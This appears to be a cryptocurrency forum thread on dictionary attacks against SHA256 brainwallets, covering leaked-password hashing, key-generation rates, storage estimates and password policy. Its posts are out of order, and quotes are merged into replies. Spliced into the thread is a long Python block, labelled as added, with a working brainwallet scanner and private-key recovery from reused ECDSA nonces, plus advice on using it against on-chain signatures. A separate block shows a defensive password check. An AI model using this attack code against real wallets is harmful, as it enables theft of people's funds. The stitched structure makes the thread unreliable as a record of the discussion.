Topic: Results of dictionary attack on SHA256 hashed keys (Read 12533 times)

member
Activity: 67
Merit: 130
I don't understand why everyone writes about billions of keys per second. It's really slower than you think, at least for now.
Calculating sha256 is really just a tiny fraction of calculating an ECDSA keypair.
While vanitygen only does 1 EC addition, calculating an ECDSA key from a seed needs at least two full-blown multiplications of big numbers.
Long story short, CPUs can only generate about 1,000 keys a second; modern GPUs can calculate 20,000 keys a second, tops.
Not billions, thousands. 6 orders of magnitude smaller than billions. 1,000 times slower than vanitygen.

Vod
legendary
Activity: 3668
Merit: 3010
Licking my boob since 1970
Probably a stupid question but how much space would be needed for a db of every hash and value?

Well "every value" is simply an infinite number.

However to store say every passphrase using printable symbol on a standard keyboard (95) up to a length of 20 would be

95^20 = 3.58 x 10^39 records

If we assume no overhead and an average of 10.5 bytes for the input and 32 bytes for the hash that would be:

1.52 x 10^41 bytes
~152,356,517,023,630,000,000,000,000,000 1 TB hard drives.

The earth has about 1.3 x 10^50 atoms, so even storing 1 bit per atom it would take up roughly a planet-sized body.  Of course, if the user had salted their hash, it wouldn't exist in your database.  To account for every 32-bit salt would require ~4 billion Earth-sized planets.

So you're saying there's a chance...

LOL +1 "Dumb and Dumber" :)
full member
Activity: 136
Merit: 100
PS: Are 25 characters enough for a strong passphrase?

25 random characters is plenty.  25 letter 'a's isn't.  There's a range between these two extremes.

Of course, you are correct. That does answer my question though, thanks.

legendary
Activity: 2940
Merit: 1333
PS: Are 25 characters enough for a strong passphrase?

25 random characters is plenty.  25 letter 'a's isn't.  There's a range between these two extremes.
full member
Activity: 136
Merit: 100
If I understand this correctly, these are all brain wallet addresses?

Mounting a more sophisticated attack could get interesting, but I'm afraid of what I'll find. ;)  Just remember to use strong passwords if you go the "brainwallet" way!


Hey, do go ahead. If you were to find something, it'd be better if we knew NOW rather than later.

PS: Are 25 characters enough for a strong passphrase?

legendary
Activity: 2940
Merit: 1333
Ha, we both found SHA256("fuckyou") which TTBit says he funded as an experiment.  It looks like I found your other address too -- are you saying you found more that I didn't find, and that you didn't post there?

I was saying that you didn't find any of the ones I found, but I was wrong.  I was comparing the transaction IDs you listed with the sha256 hashes I listed.  Duh.
legendary
Activity: 2618
Merit: 1007
Maybe a bit related: How many private keys can a wallet hold in the satoshi client and/or Armory? Millions? Billions? Terabytes? Petabytes?

The reason would be that for serious bruteforcing, one would constantly (for every block on the network) check all your gazillions of addresses if they have been funded - if yes, quickly snatch the money and sign a transaction. To do this though, one would need to iterate over a LOT of data (at least address wise, the block's data could probably be broken down into "address that received money" parts).
sr. member
Activity: 476
Merit: 250
I recently played around with this myself and found that SHA-256("test") has been used: http://blockchain.info/address/1HKqKTMpBTZZ8H5zcqYEWYBaaWELrDEXeE
Funny story behind this address. Two of those transactions were mine, one was not. Someone was obviously scanning that address for incoming transactions and snatched the rest. The set of transactions was from testing the commitcoin protocol, and at the time I was scared someone had actually calculated the private key (which can be calculated from the first two transactions and the third transaction, which is now marked as a double spend, since the corresponding signatures use the same randomness). Later I found out I forgot to set the flag that included 80 bits of randomness in the message (which, as stated, was "test"). :)
hero member
Activity: 784
Merit: 1009
firstbits:1MinerQ
This answer is pretty thorough and probably correct.  The TL;DR is that you're highly unlikely to randomly generate the same private key that someone else has, and picking a rich address and guessing its private key is much, much more unlikely.  Barring huge advances in computing power or in mathematically breaking the cryptography, everyone's coins are very safe.  And anyone with remotely enough computing power to consider trying to steal coins would make more by mining.
And even if you can generate hashes quickly, you'd have a hard time querying the blockchain at anything close to that rate. I'm sure that is more of a limit than the hashing. (But that's not the same as the OP here, as he didn't randomly generate hashes.)
sr. member
Activity: 448
Merit: 254
I'd been thinking about trying it out of curiosity for a while, and last night that curiosity finally overcame laziness.  I hacked together a script to SHA256-hash every password in a large (14 million) password leak, compute the corresponding address, and scan the blockchain for transactions touching those addresses (using blockparser.)

I did something similar some months ago and found different addresses than you did:

http://bitcoin.stackexchange.com/a/3170/659

Ha, we both found SHA256("fuckyou") which TTBit says he funded as an experiment.  It looks like I found your other address too -- are you saying you found more that I didn't find, and that you didn't post there?  I wonder if I could find more with better dictionaries (especially curating entries that bitcoiners might be likely to use.)

BTW, I've since re-run the script searching for transactions using Casascius' deterministic passphrase wallet (something like KeyN = SHA256(String(N)+"/"+passphrase+"/BITCOIN"+String(N)) where N = 1 to infinity for the keys in the wallet) and found nothing, so it looks like anyone seriously using this type of "brainwallet" is picking non-stupid passwords.

So what's the chance of finding some private key? If an uberminer generated hashes non-stop and compared them with the whole block chain, what are the chances of him getting a hit?

This answer is pretty thorough and probably correct.  The TL;DR is that you're highly unlikely to randomly generate the same private key that someone else has, and picking a rich address and guessing its private key is much, much more unlikely.  Barring huge advances in computing power or in mathematically breaking the cryptography, everyone's coins are very safe.  And anyone with remotely enough computing power to consider trying to steal coins would make more by mining.
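Two things in this thread are worth seeing in working code: the dictionary attack itself (SHA256 a password list, derive the address, look it up among funded addresses) and the "same randomness" mistake on the SHA256("test") address, where two signatures made with the same ECDSA nonce give away the private key. The block below is an added example, not the OP's script, not blockparser, and not anything from the thread's authors; it is stdlib-only Python with textbook affine secp256k1 arithmetic (slow and not constant-time, which is fine for a demo). It assumes uncompressed public keys, as 2012-era brainwallet tools produced, and uses OpenSSL's RIPEMD-160 through `hashlib.new`, which some OpenSSL 3.0 builds do not expose. The function names, the sample messages and the "funded" set are mine.

```python
"""Added example, not code from the thread: the brainwallet attack and the
nonce-reuse key recovery described above, in stand-alone Python (stdlib only).
Textbook affine secp256k1 arithmetic: fine for a demo, slow and not constant-time."""
import hashlib

# secp256k1 domain parameters: field prime, group order, generator.
P = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFFC2F
N = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141
G = (0x79BE667EF9DCBBAC55A06295CE870B07029BFCDB2DCE28D959F2815B16F81798,
     0x483ADA7726A3C4655DA4FBFC0E1108A8FD17B448A68554199C47D08FFB10D4B8)
B58 = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"


def ec_add(p, q):
    """Affine point addition; None is the point at infinity."""
    if p is None or q is None:
        return q if p is None else p
    if p[0] == q[0] and (p[1] + q[1]) % P == 0:
        return None                                   # q == -p
    if p == q:
        lam = 3 * p[0] * p[0] * pow(2 * p[1], -1, P) % P
    else:
        lam = (q[1] - p[1]) * pow(q[0] - p[0], -1, P) % P
    x = (lam * lam - p[0] - q[0]) % P
    return x, (lam * (p[0] - x) - p[1]) % P


def ec_mul(k, point=G):
    """Double-and-add scalar multiplication (demo only: not constant-time)."""
    result = None
    while k:
        if k & 1:
            result = ec_add(result, point)
        point = ec_add(point, point)
        k >>= 1
    return result


def base58check(payload):
    """payload || SHA256d(payload)[:4] in base58; leading zero bytes become '1'."""
    data = payload + hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4]
    num, digits = int.from_bytes(data, "big"), ""
    while num:
        num, rem = divmod(num, 58)
        digits = B58[rem] + digits
    return "1" * (len(data) - len(data.lstrip(b"\0"))) + digits


def brainwallet_privkey(passphrase):
    """The scheme attacked in the thread: private key = SHA256(passphrase)."""
    return int.from_bytes(hashlib.sha256(passphrase.encode()).digest(), "big")


def address(d):
    """P2PKH address of the uncompressed key 04||X||Y (what 2012-era brainwallet tools used).
    hashlib.new('ripemd160') needs an OpenSSL with RIPEMD-160; some OpenSSL 3.0 builds lack it."""
    x, y = ec_mul(d)
    pub = b"\x04" + x.to_bytes(32, "big") + y.to_bytes(32, "big")
    h160 = hashlib.new("ripemd160", hashlib.sha256(pub).digest()).digest()
    return base58check(b"\x00" + h160)


def scan(candidates, funded):
    """Dictionary attack: {passphrase: address} for candidates whose address is in `funded`."""
    hits = {}
    for passphrase in candidates:
        addr = address(brainwallet_privkey(passphrase))
        if addr in funded:
            hits[passphrase] = addr
    return hits


def ecdsa_sign(d, z, k):
    """Textbook ECDSA with a caller-chosen nonce k (no low-s normalisation)."""
    r = ec_mul(k)[0] % N
    return r, pow(k, -1, N) * (z + r * d) % N


def recover_privkey_from_reused_nonce(z1, sig1, z2, sig2):
    """Same k on two different hashes z1, z2 gives the same r and leaks d:
        s1 - s2 = k^-1 (z1 - z2)  =>  k = (z1 - z2) / (s1 - s2),  d = (s1 * k - z1) / r
    On-chain signatures may carry -s instead of s (low-s rule), so both signs are tried."""
    r, s1 = sig1
    r2, s2 = sig2
    if r != r2:
        raise ValueError("different r values: the nonce was not reused")
    for s2_try in (s2, (-s2) % N):
        k = (z1 - z2) * pow(s1 - s2_try, -1, N) % N
        pt = ec_mul(k)
        if pt is not None and pt[0] % N == r:           # the right k reproduces r
            return (s1 * k - z1) * pow(r, -1, N) % N
    raise ValueError("could not recover the key")


if __name__ == "__main__":
    d = brainwallet_privkey("test")                         # address discussed in the thread
    print("SHA256('test') ->", address(d))
    k = brainwallet_privkey("fixed nonce")                  # the mistake: one k for two messages
    z1 = int.from_bytes(hashlib.sha256(b"tx one").digest(), "big")   # constructed message hashes
    z2 = int.from_bytes(hashlib.sha256(b"tx two").digest(), "big")
    leaked = recover_privkey_from_reused_nonce(z1, ecdsa_sign(d, z1, k), z2, ecdsa_sign(d, z2, k))
    print("recovered private key matches:", leaked == d)
```

`scan` is the whole attack: the "funded" set is whatever address index you build from the chain (the OP used blockparser), and each dictionary entry costs one hash plus one scalar multiplication, which is why the key-rate post above talks in thousands of keys per second rather than billions. `recover_privkey_from_reused_nonce` needs only modular arithmetic once the two signatures share an `r`; with a real transaction pair you would pull `r`, `s` and the signed-message hash from each input's scriptSig, which is all the "third transaction" on the SHA256("test") address gave an observer.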
donator
Activity: 2058
Merit: 1007
Poor impulse control.
So what's the chance of finding some private key? If an uberminer generated hashes non-stop and compared them with the whole block chain, what are the chances of him getting a hit?

I once worked out how probable that was. I forget what the exact probability was, but it was a number with about one hundred zeros after it.

Assume a 1 in 1e100 chance per hash. You can work out yourself how many billion years it would take to brute force every address, even if you had the hashrate of the entire bitcoin network at your disposal.

legendary
Activity: 2940
Merit: 1333
I'd been thinking about trying it out of curiosity for a while, and last night that curiosity finally overcame laziness.  I hacked together a script to SHA256-hash every password in a large (14 million) password leak, compute the corresponding address, and scan the blockchain for transactions touching those addresses (using blockparser.)

I did something similar some months ago and found different addresses than you did:

http://bitcoin.stackexchange.com/a/3170/659
hero member
Activity: 546
Merit: 500

I have generated the private keys for all of the 8 addresses listed, by taking the SHA256 hash of passwords from a password list. 


Is the SHA256 hash easier to break than MD5?
No.

Thanks...
rjk
sr. member
Activity: 448
Merit: 250
1ngldh

I have generated the private keys for all of the 8 addresses listed, by taking the SHA256 hash of passwords from a password list. 


Is the SHA256 hash easier to break than MD5?
No.
hero member
Activity: 546
Merit: 500

I have generated the private keys for all of the 8 addresses listed, by taking the SHA256 hash of passwords from a password list. 


Is the SHA256 hash easier to break than MD5?
newbie
Activity: 24
Merit: 0
Just theorizing but I think most password requirements are worthless and are checking the wrong thing.

Personally if I had a site I would
a) use bcrypt which ensures passwords of 8 characters or more can't be brute forced
b) require passwords to be 8 characters
c) look up the user's attempted password against a db of known/weak/leaked passwords and reject it if found.

No need for "Th!s is my @nnoyingly l0ng password333".

"happy clown jumper" all lower case can't be brute forced if protected by bcrypt and isn't on any password list used by hackers.
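The three rules in the post above, as an added example rather than the poster's code. bcrypt is not in Python's standard library, so `hashlib.scrypt` (salted, memory-hard) stands in for it here; the shape of the check is the same with bcrypt. The leaked-password set is a small constructed stand-in for a real leak corpus, and the function names are mine.

```python
"""Added example (not from the thread): length check, leaked-password blocklist, and a
slow salted hash, the policy described in the post above. scrypt replaces bcrypt only
because it is in the standard library."""
import hashlib
import hmac
import os
import unicodedata

# Constructed stand-in for a leaked-password corpus; a real one holds hundreds of
# millions of entries, stored normalised, in a set or a bloom filter.
LEAKED = {"password", "123456", "qwerty123", "letmein", "iloveyou", "bitcoin1", "trustno1"}

MIN_LENGTH = 8
# Work factor; raise N over time, as you would raise bcrypt's cost parameter.
SCRYPT_N, SCRYPT_R, SCRYPT_P = 2 ** 14, 8, 1


def normalise(pw):
    """Case-fold and NFKC-normalise so 'LetMeIn' cannot dodge the blocklist entry 'letmein'."""
    return unicodedata.normalize("NFKC", pw).casefold()


def password_problems(pw, leaked=LEAKED):
    """Reasons the password is rejected; an empty list means it is accepted."""
    problems = []
    if len(pw) < MIN_LENGTH:
        problems.append(f"shorter than {MIN_LENGTH} characters")
    if normalise(pw) in leaked:
        problems.append("appears in a known leaked-password list")
    return problems


def hash_password(pw, salt=None):
    """Fresh 16-byte salt per password; the record carries its own parameters."""
    salt = salt or os.urandom(16)
    digest = hashlib.scrypt(pw.encode(), salt=salt, n=SCRYPT_N, r=SCRYPT_R, p=SCRYPT_P, dklen=32)
    return f"scrypt${SCRYPT_N}${SCRYPT_R}${SCRYPT_P}${salt.hex()}${digest.hex()}"


def verify_password(pw, stored):
    """Recompute with the stored parameters and compare in constant time."""
    parts = stored.split("$")
    if len(parts) != 6 or parts[0] != "scrypt":
        return False
    _, n, r, p, salt_hex, digest_hex = parts
    digest = hashlib.scrypt(pw.encode(), salt=bytes.fromhex(salt_hex),
                            n=int(n), r=int(r), p=int(p), dklen=32)
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    for candidate in ("happy clown jumper", "LetMeIn", "trustno1"):
        print(repr(candidate), "->", password_problems(candidate) or "accepted")
    record = hash_password("happy clown jumper")
    print(record)
    print("verify:", verify_password("happy clown jumper", record))
```

The blocklist lookup is what actually stops "happy clown jumper"-style passwords from being guessed: the slow hash only buys time per guess, so the two checks have to go together, and the record format lets you raise the work factor later without invalidating existing hashes.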

TheirChildrensMiddleNames
hero member
Activity: 520
Merit: 500
Probably a stupid question but how much space would be needed for a db of every hash and value?
3.123 * 10^87 gigabytes. More storage capacity than the NSA has.

If your number is right, that's not simply "more capacity than NSA has". That's more gigabytes than some estimations of the number of atoms in the known universe.

We can't store information at the sub-atomic level yet? Scientists be slackin'.
legendary
Activity: 1106
Merit: 1004
Probably a stupid question but how much space would be needed for a db of every hash and value?
3.123 * 10^87 gigabytes. More storage capacity than the NSA has.

If your number is right, that's not simply "more capacity than NSA has". That's more gigabytes than some estimations of the number of atoms in the known universe.
full member
Activity: 196
Merit: 100
Web Dev, Db Admin, Computer Technician
Probably a stupid question but how much space would be needed for a db of every hash and value?
3.123 * 10^877 gigabytes (for just one type of format, the private key, add public address and your needs almost double). More storage capacity than the NSA has.

Edit: My bad. I put an 8 where there should have been a 7.
donator
Activity: 1218
Merit: 1079
Gerald Davis
Just theorizing but I think most password requirements are worthless and are checking the wrong thing.

Personally if I had a site I would
a) use bcrypt which ensures passwords of 8 characters or more can't be brute forced
b) require passwords to be 8 characters
c) look up the user's attempted password against a db of known/weak/leaked passwords and reject it if found.

No need for "Th!s is my @nnoyingly l0ng password333".

"happy clown jumper" all lower case can't be brute forced if protected by bcrypt and isn't on any password list used by hackers.